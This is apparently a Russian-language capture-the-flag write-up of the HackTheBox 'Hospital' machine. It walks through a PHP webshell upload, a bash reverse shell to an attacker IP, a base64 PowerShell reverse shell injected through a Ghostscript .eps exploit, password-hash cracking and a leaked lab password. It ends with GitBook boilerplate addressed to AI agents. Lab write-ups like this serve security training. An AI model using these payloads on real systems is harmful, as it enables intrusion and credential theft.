> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/writeups-ctf/hackthebox/windows-medium/hospital-hackthebox-writeup.md).

# Разбор HackTheBox Hospital

{% embed url="<https://app.hackthebox.com/machines/Hospital>" %}

{% hint style="warning" %}
**Навыки:**

* Веб-перечисление
* Злоупотребление инструментом p0wny-shell для загрузки файлов
* Взлом защищённого хэша пароля
* Инъекция команды через файл типа .eps
* Повышение привилегий в домене
  {% endhint %}

## Разведка

**Настройка рабочей среды:**

Настройте рабочую среду, создав три папки для хранения важного содержимого, эксплойтов и результатов разведки Nmap.

<figure><img src="/files/99d80cfc7850938bccc2af8e146444f0cc56e99a" alt=""><figcaption></figcaption></figure>

**Проверка подключения VPN**

Проверьте подключение к VPN, чтобы обеспечить стабильную связь с целевой машиной.

<figure><img src="/files/9d434c316f14aaa64aafdeaf3c62dd1123e8a6a1" alt=""><figcaption></figcaption></figure>

**Обнаружение открытых портов с помощью Nmap:**/ Перечислите открытые порты и экспортируйте результаты в файл "allPorts" в каталоге Nmap:

```bash
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.241 -oG allPorts
```

<figure><img src="/files/373e05c66afc268e495622f32e5f24268ce7ea7e" alt=""><figcaption></figcaption></figure>

**Анализ открытых портов с помощью extractport:**/ Использование функции extractport для краткого отображения открытых портов и копирования их в буфер обмена.

<figure><img src="/files/4f829b7f6139a9daa1852e36a58caff9fc402353" alt=""><figcaption></figcaption></figure>

**Сканирование версий портов с помощью Nmap:**/ Используйте Nmap для сканирования версий служб и сохранения вывода в файл "targeted":

```bash
nmap -sCV -p22,53,88,135,139,389,443,445,464,593,636,1801,2103,2105,2107,2179,3268,3269,3389,5985,6059,6404,6406,6407,6410,6617,6639,8080,9389 10.10.11.241 -oN targeted
```

<figure><img src="/files/c5b0e155226f43db77ebe6994d09053a1697f3a6" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/7ecc5dd1b815b3ffbb0455a5ad595118ef31c1a1" alt=""><figcaption></figcaption></figure>

**Определение интерфейса порта 443**

<figure><img src="/files/c7fbec21cf978e369bc443429affef9548fee062" alt=""><figcaption></figcaption></figure>

**Определение интерфейса порта 8080**

<figure><img src="/files/edaa3da3dabe1a216237f838a2435b4c2e2ae2c4" alt=""><figcaption></figcaption></figure>

**Создание пользователя:**

Создание пользователя для установления потенциального доступа к целевой машине

<figure><img src="/files/8c9bcf577daddbec835819da19f39f8e3f758a22" alt=""><figcaption></figcaption></figure>

## Уязвимость загрузки файлов:

<figure><img src="/files/69b11e06c2eaaeea5d0832c25a86834986a56149" alt=""><figcaption></figcaption></figure>

#### Первоначальная эксплуатация:

Попытка эксплуатации уязвимости загрузки файла путём внедрения вредоносного PHP-файла

```php
<?php
system($_GET['cmd'];
?>
```

Сервер автоматически отклоняет запросы на загрузку файлов с определёнными расширениями.

<figure><img src="/files/b0d664977ae993939a63bb9f809884460bbe6eb1" alt=""><figcaption></figcaption></figure>

**Перехват с помощью Burp Suite:**

Использование Burp Suite для перехвата и анализа трафика, чтобы понять ошибки в работе

<figure><img src="/files/c31e2f5118b6728131ac2e8d20f4f82981d3ad69" alt=""><figcaption></figcaption></figure>

#### Изменение расширения PHP:

Измените расширение файла с `.php` на `.phar` в `filename` переменную, и убедитесь, что расположение успешно принято

<figure><img src="/files/87de13d0d9a92804b19f96f239e6aa0c231b23dc" alt=""><figcaption></figcaption></figure>

**Сводка каталогов:**

Использование Gobuster для определения каталогов на веб-сервере и поиска хранилища загруженных медицинских изображений.

```bash
gobuster dir -u http://10.10.11.241:8080/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20
```

<figure><img src="/files/db5e68ac701c12209a37b96070d7cd113e9b0d92" alt=""><figcaption></figcaption></figure>

#### Файл не интерпретируется:

Содержимое файла a.phar не интерпретируется.

<figure><img src="/files/567ca5c590d035287e60862070f5064fc2d63cf1" alt=""><figcaption></figcaption></figure>

**Используйте инструмент GitHub для создания шелла:**

Использование инструмента из проекта GitHub для обхода ограничений на загрузку PHP-файлов и получения доступа к оболочке

{% embed url="<https://github.com/flozz/p0wny-shell>" %}

<figure><img src="/files/5c193287e4d164140b39312c9ca9327178d917de" alt=""><figcaption></figcaption></figure>

**Запуск обратной оболочки:**

```bash
/usr/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.18/444 0>&1'
```

Запустите обратную оболочку, чтобы установить интерактивный доступ к целевой машине и получить полный контроль.

<figure><img src="/files/c583f6d6644adf385173e64c333282444d5d2250" alt=""><figcaption></figcaption></figure>

#### Как только вы получите доступ к Linux-серверу, вот команды для выполнения в терминале:

```bash
script /dev/null -c bash
# Ctrl+Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184
```

## Повышение привилегий (Linux-сервер):

**Определение версии операционной системы:**/ Используйте `cat /etc/os-release` команду, чтобы проверить версию системы; обратите внимание на наличие старой версии Ubuntu ("23.04").

<figure><img src="/files/5e5f389e90383fd047b69b7d6f495eca6786a0c1" alt=""><figcaption></figcaption></figure>

#### **Скачивание скрипта для повышения привилегий:**

Скачайте скрипт из [GitHub](https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629?source=post_page-----ce86940a895f--------------------------------), который позволяет повысить привилегии:

```bash
wget https://raw.githubusercontent.com/g1vi/CVE-2023-2640-CVE-2023-32629/main/exploit.sh
```

<figure><img src="/files/6cd0881859388ed44d37ec2034abadac263e6098" alt=""><figcaption></figcaption></figure>

#### **Извлечение хэшей паролей:** Извлеките хэши паролей из `/etc/shadow` файле.

<figure><img src="/files/d244b9b95a85f742f7e22c27f95469add63325bd" alt=""><figcaption></figcaption></figure>

**Взлом паролей:**

Используйте инструмент John the Ripper со списком паролей, известным для взлома паролей:

```bash
john -w:/usr/share/wordlists/rockyou.txt hash.txt
```

<figure><img src="/files/740a37414858295d73b522ea9bf218d37e6030dd" alt=""><figcaption></figcaption></figure>

## Уязвимость: внедрение в .eps-файл

#### Проверьте учётные данные на веб-сайте, доступном через порт 443.

<figure><img src="/files/e5c43908643d5fccba1ce4d28c0cb6c39b59dba0" alt=""><figcaption></figcaption></figure>

**Обнаружен ограниченный почтовый ящик:**

Обнаружить почтовый ящик, который хочет получить макет в формате .eps.

<figure><img src="/files/b63de8ccf895b67250024901ba238ab8ca387787" alt=""><figcaption></figcaption></figure>

**Работа Ghostscript через .eps-файл:**

Используйте [Эксплойт из GitHub](https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection/blob/main/CVE_2023_36664_exploit.py) основанный на [Ghostscript](https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection/blob/main/CVE_2023_36664_exploit.py) для выполнения вредоносного кода через `.eps` расширение файла.

<figure><img src="/files/1702ea5fc9e716a3804b13b0bfbbf09cfb0db42e" alt=""><figcaption></figcaption></figure>

#### Используйте [RevShells](https://www.revshells.com/) для создания полезной нагрузки PowerShell:

<figure><img src="/files/aef963711f19d2672a056e2dd346de8984ec36c2" alt=""><figcaption></figcaption></figure>

#### Внедрение полезной нагрузки в .eps-файл:

Используя команду для внедрения полезной нагрузки с обратной оболочкой в .eps-файл.

{% code fullWidth="true" %}

```bash
python3 exploit.py --inject --payload "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAiACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" --filename file.eps
```

{% endcode %}

<figure><img src="/files/f7d2e533f32e3f8146b5643a54b5736716aa5a9a" alt=""><figcaption></figcaption></figure>

#### Ожидание через rlwrap:

Настройка прослушивания с rlwrap в ожидании входящего соединения.

```bash
rlwrap nc -nlvp 4444
```

#### Отправка письма с вредоносным EPS-файлом:

<figure><img src="/files/0a3dc891c4e457dbf7493ca4a3af2a45e8fd02b7" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/d72b89a93713ede262a478f86d266bc606fe962c" alt="" width="563"><figcaption></figcaption></figure>

#### Обнаружение файла ghostscript.bat:

Обнаружение файла ghostscript.bat, содержащего пароль "drbrown": `chr!$br0wn`

<figure><img src="/files/b5c4757fbc5da7ff6b0cfdd9a253dd045363f301" alt=""><figcaption></figcaption></figure>

#### Первый флаг user.txt:

Обнаружение и получение первого флага user.txt.

<figure><img src="/files/59e5a79b081b2bf5f54124bf15fcae068c24cff8" alt=""><figcaption></figcaption></figure>

## Повышение привилегий в Active Directory:

#### Повышение привилегий через переход к веб-серверу XAMPP.

<figure><img src="/files/fee88d0066f0ba5ce69691d202c18f417c95bd21" alt=""><figcaption></figcaption></figure>

#### Создание PHP-файла:

Создайте PHP-файл, содержащий код "this is a test".

```bash
echo "this is a test" > test.php
```

#### Проверка веб-сервера:

Убедитесь, что веб-сервер корректно вставляет PHP-файл.

<figure><img src="/files/7b737ffb5a735e17213a810df4cc637cab686f79" alt=""><figcaption></figcaption></figure>

#### Повторно внедрите PHP-файл из [p0wny-shell](https://github.com/flozz/p0wny-shell) проекта:

{% embed url="<https://github.com/flozz/p0wny-shell>" %}

<pre class="language-bash"><code class="lang-bash">python3 -m http.server 8080

<strong>wget http://10.10.16.2:8080/shell.php -o shell.php
</strong></code></pre>

<figure><img src="/files/58f4b922e300802957c076cf722b434cd747a045" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/dd28eef16ab41320a4b5464e352b0156429bd06b" alt=""><figcaption></figcaption></figure>

#### Скопируйте [обратную оболочку](https://www.revshells.com/) полезную нагрузку в терминал pownyshell:

<figure><img src="/files/dde96f6ebc0bf7bcc0449475477a054a0465938f" alt=""><figcaption></figcaption></figure>

#### Ожидание через rlwrap:

```bash
rlwrap nc -nlvp 4444
```

### Флаг root.txt получен:

<figure><img src="/files/731b712ec9c966d3cd40aa0d3b8828a990ce25f2" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/8028a85def22f71dc2dda511298c7e7452371714" alt="" width="563"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/writeups-ctf/hackthebox/windows-medium/hospital-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
